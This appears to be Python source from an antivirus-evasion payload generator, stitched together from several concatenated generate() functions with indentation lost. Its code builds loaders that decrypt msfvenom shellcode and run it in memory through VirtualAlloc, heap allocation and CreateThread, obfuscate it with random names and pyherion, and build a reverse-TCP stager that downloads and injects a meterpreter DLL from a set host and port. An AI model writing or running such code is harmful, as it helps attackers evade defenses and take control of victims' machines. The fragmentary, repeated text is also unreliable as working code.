PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = "import ctypes\n"
PayloadCode += "from Crypto.Cipher import AES\n"
PayloadCode += "import base64\n"
PayloadCode += "import os\n"
PayloadCode += RandPadding + " = '{'\n"
PayloadCode += (
RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n"
)
PayloadCode += RandCipherObject + " = AES.new('" + secret + "')\n"
PayloadCode += (
RandDecodedShellcode
+ " = "
+ RandDecodeAES
+ "("
+ RandCipherObject
+ ", '"
+ EncodedShellcode
+ "')\n"
)
PayloadCode += RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += (
RandPtr
+ " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
+ RandShellCode
+ ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
)
PayloadCode += (
RandBuf + " = (ctypes.c_char * len(" + RandShellCode + ")).from_buffer(" + RandShellCode + ")\n"
)
PayloadCode += (
"ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",ctypes.c_int(len("
+ RandShellCode
+ ")))\n"
)
PayloadCode += (
RandHt
+ " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
+ RandPtr
+ "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
)
PayloadCode += (
"ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"
)
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = "import ctypes\n"
PayloadCode += "from Crypto.Cipher import AES\n"
PayloadCode += "import base64\n"
PayloadCode += "import os\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + RandPadding + " = '{'\n"
PayloadCode += (
"\t"
+ RandDecodeAES
+ " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip("
+ RandPadding
+ ")\n"
)
PayloadCode += "\t" + RandCipherObject + " = AES.new('" + secret + "')\n"
PayloadCode += (
"\t"
+ RandDecodedShellcode
+ " = "
+ RandDecodeAES
+ "("
+ RandCipherObject
+ ", '"
+ EncodedShellcode
+ "')\n"
)
PayloadCode += (
"\t" + RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n'
)
PayloadCode += (
"\t"
+ RandPtr
+ " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
+ RandShellCode
+ ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
)
PayloadCode += (
"\t"
+ RandBuf
+ " = (ctypes.c_char * len("
+ RandShellCode
+ ")).from_buffer("
+ RandShellCode
+ ")\n"
)
PayloadCode += (
"\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",ctypes.c_int(len("
+ RandShellCode
+ ")))\n"
)
PayloadCode += (
"\t"
+ RandHt
+ " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
+ RandPtr
+ "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
)
PayloadCode += (
"\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"
)
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = "from ctypes import *\n"
PayloadCode += "from Crypto.Cipher import AES\n"
PayloadCode += "import base64\n"
PayloadCode += "import os\n"
PayloadCode += RandPadding + " = '{'\n"
PayloadCode += (
RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n"
)
PayloadCode += RandCipherObject + " = AES.new('" + secret + "')\n"
PayloadCode += (
RandDecodedShellcode
+ " = "
+ RandDecodeAES
+ "("
+ RandCipherObject
+ ", '"
+ EncodedShellcode
+ "')\n"
)
PayloadCode += ShellcodeVariableName + " = " + RandDecodedShellcode + '.decode("string_escape")\n'
PayloadCode += (
RandMemoryShell
+ " = create_string_buffer("
+ ShellcodeVariableName
+ ", len("
+ ShellcodeVariableName
+ "))\n"
)
PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
PayloadCode += RandShellcode + "()"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = "from ctypes import *\n"
PayloadCode += "from Crypto.Cipher import AES\n"
PayloadCode += "import base64\n"
PayloadCode += "import os\n"
PayloadCode += "from datetime import datetime\n"
PayloadCode += "from datetime import date\n\n"
PayloadCode += RandToday + " = datetime.now()\n"
PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
PayloadCode += "\t" + RandPadding + " = '{'\n"
PayloadCode += (
"\t"
+ RandDecodeAES
+ " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip("
+ RandPadding
+ ")\n"
)
PayloadCode += "\t" + RandCipherObject + " = AES.new('" + secret + "')\n"
PayloadCode += (
"\t"
+ RandDecodedShellcode
+ " = "
+ RandDecodeAES
+ "("
+ RandCipherObject
+ ", '"
+ EncodedShellcode
+ "')\n"
)
PayloadCode += (
"\t" + ShellcodeVariableName + " = " + RandDecodedShellcode + '.decode("string_escape")\n'
)
PayloadCode += (
"\t"
+ RandMemoryShell
+ " = create_string_buffer("
+ ShellcodeVariableName
+ ", len("
+ ShellcodeVariableName
+ "))\n"
)
PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
PayloadCode += "\t" + RandShellcode + "()"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
self._validateArchitecture()
# randomize all of the variable names used
shellCodeName = helpers.randomString()
socketName = helpers.randomString()
intervalName = helpers.randomString()
attemptsName = helpers.randomString()
getDataMethodName = helpers.randomString()
fdBufName = helpers.randomString()
rcvStringName = helpers.randomString()
rcvCStringName = helpers.randomString()
injectMethodName = helpers.randomString()
tempShellcodeName = helpers.randomString()
shellcodeBufName = helpers.randomString()
fpName = helpers.randomString()
tempCBuffer = helpers.randomString()
payloadCode = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payloadCode += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payloadCode += "def %s():\n" %(getDataMethodName)
payloadCode += "\ttry:\n"
payloadCode += "\t\tglobal %s\n" %(socketName)
# build the socket and connect to the handler
payloadCode += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payloadCode += "\t\t%s.connect(('%s', %s))\n" %(socketName,self.required_options["LHOST"][0],self.required_options["LPORT"][0])
# pack the underlying socket file descriptor into a c structure
payloadCode += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,socketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payloadCode += "\t\tl = struct.unpack('<i', str(%s.recv(4)))[0]\n" %(socketName)
payloadCode += "\t\t%s = \" \"\n" % (rcvStringName)
# receive ALL of the payload .dll data
payloadCode += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, socketName)
payloadCode += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payloadCode += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payloadCode += "\t\tfor i in xrange(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payloadCode += "\t\treturn %s\n" % (rcvCStringName)
payloadCode += "\texcept: return None\n"
# build the method that injects the .dll into memory
payloadCode += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payloadCode += "\tif %s != None:\n" %(tempShellcodeName)
payloadCode += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payloadCode += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payloadCode += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# set up expiration options if specified
if self.required_options["expire_payload"][0].lower() == "x":
# download the stager
payloadCode += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payloadCode += "%s(%s)\n" % (injectMethodName,shellCodeName)
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
randToday = helpers.randomString()
randExpire = helpers.randomString()
payloadCode += 'from datetime import datetime\n'
payloadCode += 'from datetime import date\n\n'
payloadCode += randToday + ' = datetime.now()\n'
payloadCode += randExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
payloadCode += 'if ' + randToday + ' < ' + randExpire + ':\n'
# download the stager
payloadCode += "\t%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payloadCode += "\t%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["inject_method"][0].lower() == "heap":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
# Create Payload code
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
